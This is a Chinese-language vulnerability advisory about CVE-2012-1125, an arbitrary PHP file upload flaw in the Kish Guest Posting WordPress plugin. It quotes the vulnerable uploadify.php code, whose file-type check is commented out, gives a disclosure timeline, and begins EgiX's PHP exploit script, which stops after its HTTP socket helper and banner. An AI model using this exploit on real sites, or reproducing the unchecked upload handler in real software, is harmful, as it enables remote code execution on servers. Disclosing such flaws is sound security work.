WordPress Guest Posting插件'uploadify.php'任意文件上传漏

发布日期:2012-01-23
更新日期:2012-10-16

受影响系统:
kish kish-guest-posting 1.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51638
CVE ID: CVE-2012-1125

WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。

Kish Guest Posting plugin 1.2 for WordPress之前版本内的uploadify/scripts/uploadify.php存在不明细节文件上传漏洞,远程攻击者通过上传带有PHP扩展名的文件,然后通过文件夹参数指定目录内的文件直接请求,利用此漏洞执行任意代码。

<*来源:EgiX (n0b0d13s@gmail.com)
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php

/*
    --------------------------------------------------------------------------------
    Wordpress Kish Guest Posting Plugin 1.0 (uploadify.php) Unrestricted File Upload
    --------------------------------------------------------------------------------
   
    author............: Egidio Romano aka EgiX
    mail..............: n0b0d13s[at]gmail[dot]com
    software link.....:
   
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
   
    [-] vulnerable code in /uploadify/scripts/uploadify.php
   
    26.    if (!empty($_FILES)) {
    27.        $tempFile = $_FILES['Filedata']['tmp_name'];
    28.        $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    29.        $targetFile =  str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
    30.        // $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
    31.        // $fileTypes  = str_replace(';','|',$fileTypes);
    32.        // $typesArray = split('\|',$fileTypes);
    33.        // $fileParts  = pathinfo($_FILES['Filedata']['name']);
    34.       
    35.        // if (in_array($fileParts['extension'],$typesArray)) {
    36.            // Uncomment the following line if you want to make the directory if it doesn't exist
    37.            // mkdir(str_replace('//','/',$targetPath), 0755, true);
    38.           
    39.            move_uploaded_file($tempFile,$targetFile);
    40.            echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
    41.        // } else {
    42.        //    echo 'Invalid file type.';
    43.        // }
    44.    }
   
    Restricted access to  this script isn't properly realized,  so an attacker might  be able to upload
    arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.
   
    [-] Disclosure timeline:
   
    [19/12/2011] - Vulnerability discovered
    [19/12/2011] - Vendor notified through
    [07/01/2012] - No response from vendor, notified again via email
    [16/01/2012] - After four weeks still no response
    [23/01/2012] - Public disclosure
   
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");

fputs($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+----------------------------------------------------------------------------------+";
print "\n| Wordpress Kish Guest Posting Plugin 1.0 Unrestricted File Upload Exploit by EgiX |";
print "\n+----------------------------------------------------------------------------------+\n";

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyfssd.html